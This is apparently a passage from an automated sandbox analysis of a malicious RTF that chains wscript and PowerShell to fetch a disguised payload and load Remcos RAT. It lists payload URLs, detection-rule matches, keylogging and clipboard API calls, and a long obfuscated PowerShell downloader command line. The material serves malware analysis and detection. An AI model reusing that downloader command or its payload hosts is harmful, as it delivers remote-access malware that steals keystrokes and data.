                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.628166706.0000000000775000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.628166706.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                      Source: RegAsm.exe, 0000000F.00000002.628166706.0000000000775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp(GZ&
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: powershell.exe, 0000000A.00000002.446170067.000000000036A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000008.00000002.550401395.0000000002382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
                      Source: wscript.exe, 00000005.00000003.400951239.0000000003540000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.0000000003540000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404639771.00000000003FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401153718.00000000003F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405142889.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405126319.00000000003FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/e1cCs
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/e1cCs5
                      Source: wscript.exe, 00000005.00000003.404639771.00000000003FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401153718.00000000003F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405126319.00000000003FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/e1cCsG
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                      Source: powershell.exe, 0000000A.00000002.446552841.000000000269A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
                      Source: powershell.exe, 0000000A.00000002.455161670.0000000004E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/00
                      Source: powershell.exe, 0000000A.00000002.455161670.0000000004E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000002561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.000000000269A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49166 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000015_2_0040A2B8
                      Installs a global keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,15_2_0040B70E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004168C1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,15_2_0040B70E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,15_2_0040A3E0

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: nU7Z8sPyvf.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                      Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 3428, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Very long command line found
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 8770
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 8770Jump to behavior
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}\ProgIDJump to behavior
                      Wscript starts Powershell (via cmd or directly)
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebD